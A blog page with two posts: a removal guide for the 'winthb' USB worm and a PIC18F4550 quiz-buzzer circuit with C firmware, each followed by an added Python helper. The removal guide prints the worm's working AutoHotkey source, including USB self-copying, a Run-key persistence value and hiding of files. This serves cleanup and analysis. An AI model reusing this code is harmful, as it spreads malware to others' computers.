Monday, January 26, 2009

How to remove the winthb virus (win.exe and avgs.exe)

winthb is a virus program that recently came to my system from a USB flash drive. It makes hidden folders completely invisible (it forces Explorer's "show hidden files" setting off), copies an autorun.inf to the C: drive and recreates it whenever it is deleted. The icon of the C: drive is replaced as well (by the thb.ico dropped next to the autorun.inf).

The virus program also shows the symptoms listed below:

1. When you search for orkut in Google, it displays the error message "WARNING, orkut is sending viruses to your pc. To protect your pc close this window, orkut is infected by jammer worm" and also plays a sound (win.mp3).
2. When you try YouTube: "WARNING, Dangerous script send by youtube, Windows system files damage if this script run".
3. On my system Mozilla Firefox was disabled when the thb fellow came; anyway Firefox showed "File missing, TCP/IP module Missing from npqtplugin4.dll. it may infected by virus".


How to remove the winthb virus

1. As a first step, as soon as you have booted into Windows, press CTRL+ALT+DEL and end the processes win.exe and avgs.exe if they are running.
2. Clear the temporary folders: Start > Run, type temp, press Enter and delete everything in that folder; then do the same with %temp% (the user's temp folder, which is where the dropper keeps its winthb folder).
3. Start > Run, type regedit and press Enter; the Registry Editor window opens. [1] Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL. The program sets CheckedValue to 0; set it back to 1.
4. Hidden files can now be shown again: in Explorer go to Tools > Folder Options > View and select "Show hidden files and folders".
5. While you are in regedit, also check HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run. The reproduce.txt script shown further down writes a value named winlogon there (pointing at win.exe with std.txt as its argument) so that the virus is started again at every logon; delete that value, otherwise the files will be running again after the next reboot.
6. Search for avgs.exe with Windows Search and note the path of every copy it finds. Do not double-click a drive to open it: that is how most of these viruses get in, because Explorer then runs the drive's autorun.inf. If you have to open a drive, type its path into the address bar instead. I got the fellows from my C:\windows\system32\win.dll\ folder.
7. The folder icon for win.dll did not appear as a usual folder icon; it had the icon of a DLL file, and it was hidden as well. So please do not run any of the virus files while doing this; if you do, you will not see hidden files any more and you have to do step [1] again. Find the folder and delete it, and delete any file named win.exe or avgs.exe. The folder C:\windows\system32\win.dll\ contained these files:
win.exe
avgs.exe
Desktop.ini
std.txt
Drivelist.txt
Icon.ico
reproduce.txt
win.mp3
thb.ico
Dll.ico
script1.txt
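The reason for the "do not double-click the drive" advice is that Explorer reads the drive's autorun.inf and may run whatever the [autorun] section points at. The parser below is an added example, not code from the post or from the winthb sample: it reads an autorun.inf and reports the commands Explorer could execute and the icon it would show. The sample file is constructed in the style of the winthb drop (the real winthb autorun.inf is not reproduced on the page), so its contents are an assumption.

```python
"""Parse an autorun.inf and report what Explorer could launch on a double-click.

Added example (not from the original post). SAMPLE_AUTORUN is constructed to
resemble the winthb drop; the real file is not on the page.
"""
import re
from typing import List, NamedTuple, Optional, Set, Tuple

# Keys in [autorun] whose value is a command line Explorer may execute:
#   open=...                  run on AutoPlay / double-click
#   shellexecute=...          same, via ShellExecute
#   shell\<verb>\command=...  context-menu verbs; "open" and "explore" are the
#                             ones a double-click or "Explore" trigger
LAUNCH_KEYS = ("open", "shellexecute")
VERB_RE = re.compile(r"^shell\\([^\\]+)\\command$")


class AutorunInfo(NamedTuple):
    commands: List[Tuple[str, str]]   # (key, command line) in file order
    icon: Optional[str]
    label: Optional[str]


def parse_autorun(text: str) -> AutorunInfo:
    """Collect launch commands, icon and label from the [autorun] section.

    Keys and section names are case-insensitive; ';' lines are comments."""
    section = None
    commands: List[Tuple[str, str]] = []
    icon = label = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key in LAUNCH_KEYS or VERB_RE.match(key):
            commands.append((key, value))
        elif key == "icon":
            icon = value
        elif key == "label":
            label = value
    return AutorunInfo(commands, icon, label)


def launch_targets(info: AutorunInfo) -> Set[str]:
    """Executables that would be started, stripped of arguments and quotes."""
    targets = set()
    for _, cmd in info.commands:
        cmd = cmd.strip()
        exe = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split()[0]
        targets.add(exe)
    return targets


def is_suspicious(info: AutorunInfo) -> bool:
    """A drive root has no business launching anything; any launch command
    is treated as suspicious. An icon alone is benign but worth noting, since
    malware uses it to make the drive look legitimate."""
    return bool(info.commands)


# Constructed sample in the style of the winthb drop (not the real file):
# a fake icon plus the same command wired to double-click and "Explore".
SAMPLE_AUTORUN = r"""[AutoRun]
icon=thb.ico
open=RECYCLE\win.exe RECYCLE\std.txt
shell\open\Command=RECYCLE\win.exe RECYCLE\std.txt
shell\explore\command=RECYCLE\win.exe RECYCLE\std.txt
shell\open\Default=1
"""

if __name__ == "__main__":
    info = parse_autorun(SAMPLE_AUTORUN)
    print("launch commands:", info.commands)
    print("would run:", sorted(launch_targets(info)))
    print("icon:", info.icon, "| suspicious:", is_suspicious(info))
```

Run it against the autorun.inf on a suspect USB stick (open the file in Notepad and paste it into SAMPLE_AUTORUN, or read it with open()) before the drive is ever double-clicked; a drive root whose autorun.inf carries an open= or shell\...\command= line pointing at a file on the same stick is exactly the pattern this worm relies on.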


The virus scripts look like the ones below. They are AutoHotkey source files; win.exe and avgs.exe are run with a script path as their argument, which is how the AutoHotkey runtime is invoked, so they are evidently renamed copies of it. std.txt is the one started from the Run policy value: it forces the "show hidden files" setting off and starts the other two scripts.
std.txt
#notrayicon
#singleinstance,ignore
; read Explorer's "Show hidden files" setting
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
; and force it to 0 so the dropped folders stay invisible
ifnotequal,regdata,0
 regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
; start the browser blocker (script1.txt) and the replicator (reproduce.txt)
Run D:\RECYCLE\win.exe D:\RECYCLE\script1.txt
Run D:\RECYCLE\avgs.exe D:\RECYCLE\reproduce.txt


reproduce.txt
; runs under avgs.exe every 5 seconds: copies itself to removable drives,
; keeps the autostart value in place and keeps autorun.inf and thb.ico on C:\
#notrayicon
#persistent
ArrayCount = 0
; driveList.txt holds one drive letter per line
Loop, Read,D:\RECYCLE\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

; copy the reg.bkp folder (the payload) to the root of every removable drive
; that is ready, overwriting what is there (flag 1)
Loop %ArrayCount%
{

    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
     {
     driveget,data1,status,%element%:\
      ifequal,data1,Ready
      {
        FileCopydir,D:\RECYCLE\reg.bkp,%element%:\,1

      }

     }
}
; persistence: policies\Explorer\Run is an autostart location; put the
; winlogon value back whenever it is missing or has been changed
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,D:\RECYCLE\win.exe D:\RECYCLE\std.txt

; no braces, so only the filedelete line is conditional: both Filecopy lines
; run every 5 seconds. Filecopy does not overwrite an existing file, so they
; only take effect once the file has been deleted, which is why autorun.inf
; keeps coming back.
ifnotexist,c:\thb.ico
 ifnotexist,c:\autorun.inf
         filedelete,c:\autorun.inf
         Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\thb.ico,c:\
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\autorun.inf,c:\
return


script1.txt

; runs under win.exe every 2 seconds: closes any window whose title mentions
; orkut, youtube or Mozilla Firefox and shows the fake warnings from above
; (msgbox option 262160 = always-on-top + stop icon; the trailing 30 is a
; 30 second timeout)
#persistent
#notrayicon
settimer,ban,2000
return

ban:
; first match on the active window's title, whatever the browser
WinGetActiveTitle, ed
 ifinstring,ed,orkut
  {
   winclose %ed%
   soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
   return
  }
 ifinstring,ed,youtube
  {
   winclose %ed%
   soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
   return
  }
 ifinstring,ed,Mozilla Firefox
  {
    winclose %ed%
    msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus  `r`r       ,30
    return
  }
; for Internet Explorer also read the text of its first four edit controls
; (address bar and similar), so a page is caught even when its title does
; not contain the name
ifwinactive ahk_class IEFrame
{

 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }

}
return

File actions performed by the dropper:

  • Creates c:\windows\system32\win.dll\svchost.exe
  • Creates folder C:\WINDOWS\system32\win.dll
  • Creates folder C:\WINDOWS\system32\win.dll\reg.bkp
  • Copies file c:\docume~1\user\locals~1\temp\winthb\win.exe to c:\windows\system32\win.dll\win.exe
  • Copies file c:\docume~1\user\locals~1\temp\winthb\avgs.exe to c:\windows\system32\win.dll\avgs.exe
  • Copies file c:\docume~1\user\locals~1\temp\winthb\drivelist.txt to c:\windows\system32\win.dll\drivelist.txt
  • Copies file c:\docume~1\user\locals~1\temp\winthb\win.mp3 to c:\windows\system32\win.dll\win.mp3
  • Copies file c:\docume~1\user\locals~1\temp\winthb\Icon.ico to c:\windows\system32\win.dll\Icon.ico
  • Copies file c:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\windows\system32\win.dll\thb.ico
  • Copies file c:\docume~1\user\locals~1\temp\winthb\DLL.ico to c:\windows\system32\win.dll\DLL.ico
  • Deletes c:\autorun.inf
  • Copies file c:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\thb.ico
  • Copies file c:\docume~1\user\locals~1\temp\winthb\autorun.inf to c:\autorun.inf

After all these things I found a copy of the thb files in my D:\RECYCLE; it looked like RECYCLER but there was no R at the end. Clear that also. I don't know whether the script has any other effects; if you find any, feel free to comment. Thanks.

Monday, January 12, 2009

Simple College/School Quiz Buzzer Circuit using PIC 18F4550 with 7-Segment Display

A buzzer finds application in quizzing, where the quiz master must know exactly who pressed their button first to answer the question. Instead of lighting the bulb that corresponds to the person who pressed first, we can show that person's number on a 7-segment display. This is desirable since it is simple and consumes less power than lighting a bulb. The PIC 18F4550 can be programmed over a USB cable connected to the PC: no programmer hardware is needed once the bootloader has been programmed into the device. For that we need the PICDEM FS USB tool available on Microchip's site, which loads the program into the device over USB. The C18 compiler also needs to be installed, together with the MPLAB IDE, to develop the software for the project.
#include "p18cxxx.h"
#include "usart.h"

extern void _startup (void);
// See c018i.c in your C18 compiler directory.
// User code starts at 0x800 because the USB bootloader occupies the bottom
// of flash, so the reset vector is placed there and jumps to the C18 startup.
#pragma code _RESET_INTERRUPT_VECTOR = 0x000800
void _reset (void)
{
    _asm goto _startup _endasm
}
#pragma code

#define byte unsigned char
void delay (void);
void display(byte);

void main(void)
{
    byte c = 0;

    TRISD = 0;      // PORTD: output, drives the 7-segment display
    TRISB = 255;    // PORTB: input, one push button per pin (active low)

    while (1)
    {
        // A pressed button pulls its pin to ground, so invert the port:
        // a set bit in c means that key is down.
        c = ~PORTB;
        switch (c)
        {
            // Exactly one key down: show its number (RB0 -> 0 ... RB7 -> 7).
            case 1:   display(0); break;
            case 2:   display(1); break;
            case 4:   display(2); break;
            case 8:   display(3); break;
            case 16:  display(4); break;
            case 32:  display(5); break;
            case 64:  display(6); break;
            case 128: display(7); break;
            // No key, or more than one key in the same instant: blank display.
            default:  display(10); break;
        }

        delay();

        // First key wins: stay here until the hardware reset (pin 1, MCLR,
        // pulled to ground), which restarts the program from the start of main.
        if (c)
        {
            while (1);
        }
    }
}

void delay(void)
{
    // volatile keeps the compiler from optimising the empty busy-wait away
    volatile long int count = 200000;
    while (count--)
    {
    }
}

void display(byte a)
{
    // Patterns for a common-anode display on PORTD (a 0 bit turns a segment on).
    // These may or may not match your display's pin order; to find out which
    // bit drives which segment, write a small test program first.
    switch (a)
    {
        case 0:  PORTD = 0b01000000; break;
        case 1:  PORTD = 0b11111010; break;
        case 2:  PORTD = 0b00100100; break;
        case 3:  PORTD = 0b00110000; break;
        case 4:  PORTD = 0b10010010; break;
        case 5:  PORTD = 0b00010001; break;
        case 6:  PORTD = 0b00000001; break;
        case 7:  PORTD = 0b11111000; break;
        case 8:  PORTD = 0b00000000; break;
        case 9:  PORTD = 0b10010000; break;
        case 10: PORTD = 0b11111111; break;   // all segments off (blank)
        default: PORTD = 0b11111111; break;
    }
}

PORTD is used as the output port, i.e. it drives the seven-segment display that shows the number of the pressed pin on PORTB. Each PORTB pin is normally held at VCC through a 10k pull-up; a switch between the pin and ground pulls it low to signal a key press. The circuit detects the first key pressed among the 8 keys and shows that key's number on the seven-segment display.
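The display() table above comes with the warning that it may not match every display, and the post suggests writing test programs to find out which bit drives which segment. The script below is an added host-side check, not code from the post: it decodes each PORTD pattern into the segments it would light under an assumed wiring, compares that with the segments a digit needs, and models the first-key decoder. The bit-to-segment mapping is inferred from the post's own patterns (the post does not state it), and the assumption that bit 3 drives the decimal point is mine; on that assumption most of the patterns also light the decimal point, which is exactly the kind of thing the test program is meant to reveal.

```python
"""Host-side check of the buzzer firmware's 7-segment table and key decoder.

Added example (not from the original post). BIT_TO_SEGMENT is inferred from
the post's patterns and is an assumption, as is bit 3 = decimal point.
"""
from typing import Dict, FrozenSet, Optional, Tuple

# Assumed wiring of PORTD bits to common-anode segments (0 = segment lit).
BIT_TO_SEGMENT = {0: "b", 1: "a", 2: "c", 3: "dp", 4: "e", 5: "f", 6: "g", 7: "d"}

# The display() table from the post, as written.
POST_PATTERNS = {
    0: 0b01000000, 1: 0b11111010, 2: 0b00100100, 3: 0b00110000, 4: 0b10010010,
    5: 0b00010001, 6: 0b00000001, 7: 0b11111000, 8: 0b00000000, 9: 0b10010000,
}

# Segments each digit needs (9 drawn without the bottom bar, as in the post;
# add "d" to WANT[9] if you prefer the closed form).
WANT = {0: "abcdef", 1: "bc", 2: "abdeg", 3: "abcdg", 4: "bcfg",
        5: "acdfg", 6: "acdefg", 7: "abc", 8: "abcdefg", 9: "abcfg"}


def lit_segments(pattern: int) -> FrozenSet[str]:
    """Segments a common-anode display lights for a PORTD byte (active low)."""
    return frozenset(seg for bit, seg in BIT_TO_SEGMENT.items()
                     if not (pattern >> bit) & 1)


def encode(segments: str) -> int:
    """Build the active-low PORTD byte that lights exactly these segments."""
    value = 0xFF
    for bit, seg in BIT_TO_SEGMENT.items():
        if seg in segments:
            value &= ~(1 << bit) & 0xFF
    return value


def check_table() -> Dict[int, Tuple[FrozenSet[str], FrozenSet[str]]]:
    """For each digit: (segments missing, segments lit that should not be)."""
    report = {}
    for digit, pattern in POST_PATTERNS.items():
        got = lit_segments(pattern)
        want = frozenset(WANT[digit])
        report[digit] = (want - got, got - want)
    return report


def pressed_key(portb: int) -> Optional[int]:
    """Model the firmware's switch on ~PORTB: the key number when exactly one
    active-low button is down, None (blank display) for none or several."""
    c = ~portb & 0xFF
    if c and (c & (c - 1)) == 0:      # exactly one bit set
        return c.bit_length() - 1
    return None


if __name__ == "__main__":
    for digit, (missing, extra) in sorted(check_table().items()):
        print(digit, "missing:", sorted(missing), "extra:", sorted(extra))
    print("corrected pattern for 0:", bin(encode(WANT[0])))
    print("RB1 pressed ->", pressed_key(0b11111101))
    print("RB1+RB2 pressed ->", pressed_key(0b11111001))
```

If the check reports the decimal point as "extra" for most digits on your board, the fix is either to leave RD3 unconnected or to regenerate the table with encode(), which keeps bit 3 high; and pressed_key() shows the firmware's one limitation, that two buttons closing in the same scan blank the display and then latch, so a contested press needs a rematch.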